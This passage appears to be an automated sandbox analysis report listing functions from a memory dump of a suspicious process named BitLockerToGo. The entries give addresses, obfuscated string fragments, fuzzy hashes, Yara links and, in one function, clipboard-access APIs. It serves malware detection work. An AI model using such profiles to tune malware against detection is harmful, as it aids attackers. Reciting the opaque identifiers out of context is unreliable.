                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .;G;$>;G;$@;F;$G;W;$Q;T;$V:V:$W;_;$[;D;$]:\:$c:`:$g;<;$k;C;$u`F
                                                                                                                                                                                                              • API String ID: 0-3103227700
                                                                                                                                                                                                              • Opcode ID: cf5f6cfcfcc8c34ddac180bef316d3683c96ab5eb13888d248b4c790b45a638b
                                                                                                                                                                                                              • Instruction ID: 028213aa433ddf288215a5674f5d4d0f941e1b1d4c6d6926550f47548b27ddf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf5f6cfcfcc8c34ddac180bef316d3683c96ab5eb13888d248b4c790b45a638b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 776279B5904728DFCB24CF59D881A99BBB1FF45300F4681ACC95A6F326DB35A952CF80
                                                                                                                                                                                                              Function 004282FF Relevance: 14.0, Strings: 11, Instructions: 280COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $r0r$%r$r$'r0r$1r6r$2r&r$2r3r$2r_r$4rur$4rzr$8r(r$>r.r
                                                                                                                                                                                                              • API String ID: 0-2425828681
                                                                                                                                                                                                              • Opcode ID: e205d00ee8b9a4674dc0b4fac78f282993e04d376fffca3607ecebd0d495f633
                                                                                                                                                                                                              • Instruction ID: 81cc660f109df6557e9303301d4da439a098a7d82eeea6cd058469eeb5b93a8e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e205d00ee8b9a4674dc0b4fac78f282993e04d376fffca3607ecebd0d495f633
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 978113B19002159FD7A49FAAD941B6ABA70FB49710F5101ECF900AF3AACB70C851CFD9
                                                                                                                                                                                                              Function 0040AA40 Relevance: 12.9, Strings: 10, Instructions: 366COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: !w$#"$);$2&$2&$M@$O!$T#$T#$a|
                                                                                                                                                                                                              • API String ID: 0-3803853066
                                                                                                                                                                                                              • Opcode ID: 69a5a64790731de0feb230137af4b1b82fe8995f99c315a87f0ff6618fa1f260
                                                                                                                                                                                                              • Instruction ID: acfacfabb2a5029957ff4e17980624ce5e54fff5e14e6eddc0bb2ddcddbd3dc1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69a5a64790731de0feb230137af4b1b82fe8995f99c315a87f0ff6618fa1f260
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49C100766083508BC714CF25D4902ABBAE2EFD1300F29493EE8D66B391D77989198BC7
                                                                                                                                                                                                              Function 00431AA0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97clipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                              • String ID: ,L
                                                                                                                                                                                                              • API String ID: 2832541153-125990122
                                                                                                                                                                                                              • Opcode ID: 583a4a280218dd810b366a662b4e29d21043c6b3543188f5b4f9a14212bd8230
                                                                                                                                                                                                              • Instruction ID: 0e5153eb2e66eae60bb3f0c5dcad715d332eda572643828ea14e568d64c61237
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 583a4a280218dd810b366a662b4e29d21043c6b3543188f5b4f9a14212bd8230
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A318AB55083118EC304BFB8D58536EBBF0EF95354F01283EE4C6972A1E6389589C75B
                                                                                                                                                                                                              Function 0041D1E0 Relevance: 12.1, Strings: 9, Instructions: 844COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: DN}\$FUKL$F^WQ$GRO]$TNm\$T^iQ$XUYL$_WCR$f4P4
                                                                                                                                                                                                              • API String ID: 0-2031968443
                                                                                                                                                                                                              • Opcode ID: 6835ad1e5348a96bb07f015d60c442263b8aca0fee0772344b8169b30b5a1a47
                                                                                                                                                                                                              • Instruction ID: c005d7f4e58b4f5752065deb673c861d2062528606b7a60b532c08cc6f8db72c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6835ad1e5348a96bb07f015d60c442263b8aca0fee0772344b8169b30b5a1a47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A44249B090C3518FC725DF24C8407ABBBE1EF85314F04866EE8E95B392D7399946CB96
                                                                                                                                                                                                              Function 00417941 Relevance: 11.5, Strings: 9, Instructions: 295COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 2#E#$@#O#$G#;#$M#X#$Y#S#$[#@#$\"$]#^#$##
                                                                                                                                                                                                              • API String ID: 0-479699498
                                                                                                                                                                                                              • Opcode ID: 45272892d45149cd438995c8ea1f7b94d69bae0bd1d0544904f269d3cc6ee449
                                                                                                                                                                                                              • Instruction ID: 7f27c49e7c94b4d10b5370819cf722759646e6727da8469b84d408ed18f423d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45272892d45149cd438995c8ea1f7b94d69bae0bd1d0544904f269d3cc6ee449
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94B156B05293818BD3798F14D4917EBB7F1EFC6304F148AADD4CA9B250EB348985CB96
                                                                                                                                                                                                              Function 0041AE87 Relevance: 10.4, Strings: 8, Instructions: 381COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: A>A$' $-1_1$d$j5x5$p5$p5w5$p55
                                                                                                                                                                                                              • API String ID: 0-3154447829
                                                                                                                                                                                                              • Opcode ID: c68db94be781fdeac12f7f4d991d4ccde1ed6db1db41ac42c5c63958503d75d9
                                                                                                                                                                                                              • Instruction ID: 6542572ee08b2f9f63caf3940d11828b89c8ca182eacda133ddebf08090a571d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c68db94be781fdeac12f7f4d991d4ccde1ed6db1db41ac42c5c63958503d75d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DC169B551C3449AD708DF6AD81686FBAF6EFD6304F04C82CE0899B361E639C644CB5B
                                                                                                                                                                                                              Function 0041B3C6 Relevance: 10.2, Strings: 8, Instructions: 219COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: A>A$' $-1_1$d$j5x5$p5$p5w5$p55
                                                                                                                                                                                                              • API String ID: 0-3154447829
                                                                                                                                                                                                              • Opcode ID: 4a068b9f762550d7c59bac50240e4c43d876da3c1b22c80e3080d64a68812b49
                                                                                                                                                                                                              • Instruction ID: 1c07c9a540d6b8efe5ca87d6fc86f47dc3a41f56f8d20e88fc6147ed79b22d96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a068b9f762550d7c59bac50240e4c43d876da3c1b22c80e3080d64a68812b49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D719AB551C310ABD708DF6AD8168AFBAF6EFD5305F04C82DE48887350E638C5448B5A
                                                                                                                                                                                                              Function 004095F0 Relevance: 9.1, Strings: 7, Instructions: 393COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: !<$2C1B840C4ED5F58F4EC0E979F11769B5$act$a7$cb$i{$rf
                                                                                                                                                                                                              • API String ID: 0-670324967
                                                                                                                                                                                                              • Opcode ID: 86e92a998aa1ea2e0f6073676f518e52462d5e6c92c5c88b1a63f6f499f7482c
                                                                                                                                                                                                              • Instruction ID: 3cf3d8ee2c8f5a358792c2fe916356df29e4bc0209edd4e09c18525d3d907d92
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86e92a998aa1ea2e0f6073676f518e52462d5e6c92c5c88b1a63f6f499f7482c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADC126B2A187108BD318CF25C84066BB7E6FFC5304F15892DE5D5AB3A1DBBD9805CB86
                                                                                                                                                                                                              Function 0041B427 Relevance: 8.0, Strings: 6, Instructions: 513COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: (./.$(:z:$8:$d.h.$v:g:$.
                                                                                                                                                                                                              • API String ID: 0-3666395891
                                                                                                                                                                                                              • Opcode ID: 63c1c7cc027aac49b0323a6be64af49e2444ef1c0d19ce9558f290cf641a5ab7
                                                                                                                                                                                                              • Instruction ID: faadfb5b07b3a01eb163f203b309823f8bdc7601debab3d902b640c2a6561c98
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63c1c7cc027aac49b0323a6be64af49e2444ef1c0d19ce9558f290cf641a5ab7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05D101B15183148BC718DF14C8826ABB3B1FFE9354F14891DE4859B3A0F77C9A84C79A
                                                                                                                                                                                                              Function 0041FC40 Relevance: 8.0, Strings: 6, Instructions: 494COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: &> >$8>>$;>>$=>3>$h't$t3
                                                                                                                                                                                                              • API String ID: 0-1698606997
                                                                                                                                                                                                              • Opcode ID: 1967b17bf7447eda783b504030ec950db28d5bb331df22f7fe09a39943fb8333
                                                                                                                                                                                                              • Instruction ID: d34ed57fac0b554c0e8c558676f148ee66d8187c39776088df00cf94b577dc65
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1967b17bf7447eda783b504030ec950db28d5bb331df22f7fe09a39943fb8333
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDD123719083148BC324DF28C8516ABB3F1FFD1350F198A2DE9859B3A0E7799945CB8A
                                                                                                                                                                                                              Function 00424AB0 Relevance: 7.7, Strings: 6, Instructions: 219COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: %I$I$)&$w$II$II$II
                                                                                                                                                                                                              • API String ID: 0-4115442998
                                                                                                                                                                                                              • Opcode ID: 099fca32a5a0381d3200e712ef51abc6305ba87ef9cbe0321e73727cab072e75
                                                                                                                                                                                                              • Instruction ID: 9a82d86a50bb1d943e9aee27f3bcdda412eef8f680ea667c45a6bc25959f695a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 099fca32a5a0381d3200e712ef51abc6305ba87ef9cbe0321e73727cab072e75
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 656135B12193108BD714DF26E85222BB6E1FFD1354F56C92DE6C58B394EB78C940CB4A
                                                                                                                                                                                                              Function 0041508C Relevance: 7.5, Strings: 5, Instructions: 1251COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 2[A$D$Yj]j$^6d6$7\6
                                                                                                                                                                                                              • API String ID: 0-4002117736
                                                                                                                                                                                                              • Opcode ID: 09de04ddfc22846e8d90e8624b3dcdff5cfe688476c99d53f7b16d8ccdb9ba5f
                                                                                                                                                                                                              • Instruction ID: 65facd696550c81917b79e18011b573b99a6ce16cc60624ffa50a3b763ffd147
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09de04ddfc22846e8d90e8624b3dcdff5cfe688476c99d53f7b16d8ccdb9ba5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43721374118301CBD728CF24C891BABB7E2FFCA304F59496DE4869B361E7388945CB5A
                                                                                                                                                                                                              Function 004258C0 Relevance: 6.8, Strings: 5, Instructions: 529COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $o)p$$s(w$:0>z$P[B$hW4i
                                                                                                                                                                                                              • API String ID: 0-4169148768
                                                                                                                                                                                                              • Opcode ID: 92bff637c38e803f548c52a7efeb1d358451f7fd467df843ebc95df7d03fbb13
                                                                                                                                                                                                              • Instruction ID: 90a262017232193678903056d2074bc7886d7778d7aabcd8a83e3143f0e93dff
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92bff637c38e803f548c52a7efeb1d358451f7fd467df843ebc95df7d03fbb13
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2026675A187908FC7149F25E84126BBBE1AFC6304F48883EE5C59B391E739D905CB8A
                                                                                                                                                                                                              Function 00414BFF Relevance: 6.5, Strings: 5, Instructions: 248COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 4[$7$@[k[$I[C[$gfff
                                                                                                                                                                                                              • API String ID: 0-4159987592
                                                                                                                                                                                                              • Opcode ID: 0258b57c9dd407ffd696f3744c87620aeba75f9196f01a32ac6b1d76cfd3850a
                                                                                                                                                                                                              • Instruction ID: 8cdd63041f0f842168102e3a5758eccb549fd33851e9219b6cf928ec0aa00146
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0258b57c9dd407ffd696f3744c87620aeba75f9196f01a32ac6b1d76cfd3850a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E47157B2A142214BC338CF29DC527AB72D6EBC5314F09863ED485DB395EB38C94687C4
                                                                                                                                                                                                              Function 004278E0 Relevance: 5.4, Strings: 4, Instructions: 386COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: &%$RuB$AF$AF
                                                                                                                                                                                                              • API String ID: 0-3852744230
                                                                                                                                                                                                              • Opcode ID: 88d226bd17e06d4a50ad62b2e6fdf24f15a5ca1c4edb3bfdd6b42e1eb4cdd823
                                                                                                                                                                                                              • Instruction ID: dfa204c89a3c58449d1a0b749b393e7ded32929c94e4c84fc42d7b7b284c9193
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88d226bd17e06d4a50ad62b2e6fdf24f15a5ca1c4edb3bfdd6b42e1eb4cdd823
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5EB1CDB42083118BC714DF59D86176BB7B1FF86364F04892DE4868B7A0E778DA44CB9A
                                                                                                                                                                                                              Function 004187B0 Relevance: 5.0, Strings: 3, Instructions: 1259COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: aa$aa$aa
                                                                                                                                                                                                              • API String ID: 2994545307-1415837818
                                                                                                                                                                                                              • Opcode ID: 05b8bf578a61307734bfe628953ef62c7d2f2f2bb29f05ab28d29850d8836f52
                                                                                                                                                                                                              • Instruction ID: 4ebdd1466e0f266038cad9e56a4b6f857e8bacc5c0bd639eab04d4e0b70e9bb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05b8bf578a61307734bfe628953ef62c7d2f2f2bb29f05ab28d29850d8836f52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3882E1356083009BD728DF64C951BABB7E2FFD5700F14882EE9859B361DB759C81CB8A
                                                                                                                                                                                                              Function 00404C50 Relevance: 3.3, Strings: 2, Instructions: 826COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0$8
                                                                                                                                                                                                              • API String ID: 0-46163386
                                                                                                                                                                                                              • Opcode ID: 3ed0d6830a8554cf46025e2987cd2b095edf7e30737a53db60f8be4faf2ae410
                                                                                                                                                                                                              • Instruction ID: 0cabc95b40cbdf852b40321e471e995f7ff437c6369a2c1dd20d38e14c43e175
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ed0d6830a8554cf46025e2987cd2b095edf7e30737a53db60f8be4faf2ae410
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F67236716083419FD714CF28C880B9BBBE1AFC4314F14892EF9899B391D379D949CB96
                                                                                                                                                                                                              Function 0043CF30 Relevance: 3.1, Strings: 2, Instructions: 579COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: _Ve;$_Ve;
                                                                                                                                                                                                              • API String ID: 0-151471760
                                                                                                                                                                                                              • Opcode ID: 7c31af2349487065de3ec16c50fa5805335ed70d4b80ecce53eca0737d434edb
                                                                                                                                                                                                              • Instruction ID: b9cef9a62d789277b08974abb1ffb3ade618f9a29f5c2e9914fbabe007b2601f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c31af2349487065de3ec16c50fa5805335ed70d4b80ecce53eca0737d434edb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0012E436B14210CFD318CF28E89066AB3E2EFCA314F1A857DD98997394DB39DC558B85
                                                                                                                                                                                                              Function 004218B7 Relevance: 2.9, Strings: 2, Instructions: 391COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: Wmc'$!}
                                                                                                                                                                                                              • API String ID: 0-2669877982
                                                                                                                                                                                                              • Opcode ID: 44664b35395161a749d65300822a10a44aefc4fe1f7dee0ed1090c52d52e3bcd
                                                                                                                                                                                                              • Instruction ID: 8c0078ad2e5ec3af00df463890218d70eee204b7817b341e649e300aeaab5c14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44664b35395161a749d65300822a10a44aefc4fe1f7dee0ed1090c52d52e3bcd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EC10EB56083A08BD324DF25D89076BBBE1FFE6700F158A2DE4C59B360D7799801CB86
                                                                                                                                                                                                              Function 00416106 Relevance: 2.9, Strings: 2, Instructions: 386COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID: L4$L4
                                                                                                                                                                                                              • API String ID: 2994545307-3214460456
                                                                                                                                                                                                              • Opcode ID: a09ee7167c115e170ee42f0b26bdb240993a8ea3bbdbe79a7d92323b5bf92e40
                                                                                                                                                                                                              • Instruction ID: 0731e5ece17aa7bf616b3a6a295aa08d5fa02eeb2a81c467f509a8fc4edcbb82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a09ee7167c115e170ee42f0b26bdb240993a8ea3bbdbe79a7d92323b5bf92e40
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67C15871208301AFC724CF24D891BABB7E2FFD5314F15492DE58687261DB34D885CB4A
                                                                                                                                                                                                              Function 00404320 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: )$IEND
                                                                                                                                                                                                              • API String ID: 0-707183367
                                                                                                                                                                                                              • Opcode ID: 8c0879b488e29b7b094453b4c94cba1a031e2a5f1f351697210e4e01a418adc0
                                                                                                                                                                                                              • Instruction ID: 332bef3d2256316ea487da6c93dd4fd52e2146b24c4f6939ef00c301c6d45761
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c0879b488e29b7b094453b4c94cba1a031e2a5f1f351697210e4e01a418adc0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5ED1D0B19083449FD710DF14D84175FBBE4AB94308F14482EFA98AB3C2D779D908CB96
                                                                                                                                                                                                              Function 0042F069 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $*W{$$*W{
                                                                                                                                                                                                              • API String ID: 0-3402859032
                                                                                                                                                                                                              • Opcode ID: e217d1e85ac749c711554024fabc208f082ea7765bcccc4869b06ed7844579f9
                                                                                                                                                                                                              • Instruction ID: 89601e843a8af6c4a7b9a2e3ca9b4a9194c7c5369a803fd787dd20af866d41cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e217d1e85ac749c711554024fabc208f082ea7765bcccc4869b06ed7844579f9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD10576605B408FC314CF38D8912A6BBF2FFD9314F19897DD5AA8B3A5EA34A405CB05
                                                                                                                                                                                                              Function 0042D65C Relevance: 2.8, Strings: 2, Instructions: 297COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
